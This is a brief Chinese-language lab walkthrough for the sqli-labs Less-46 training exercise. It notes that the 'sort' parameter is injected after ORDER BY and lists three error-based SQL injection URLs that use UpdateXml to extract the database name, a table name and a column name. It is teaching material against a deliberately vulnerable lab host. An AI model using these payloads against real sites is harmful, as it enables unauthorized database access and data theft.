http://192.168.136.128/sqli-labs-master/Less-46/?sort=1
sort=4时出现报错
说明参数是添加在order by 之后
错误信息没有屏蔽,直接使用UpdateXml函数报错
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),0x7e),1)%23
http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1),0x7e),1)%23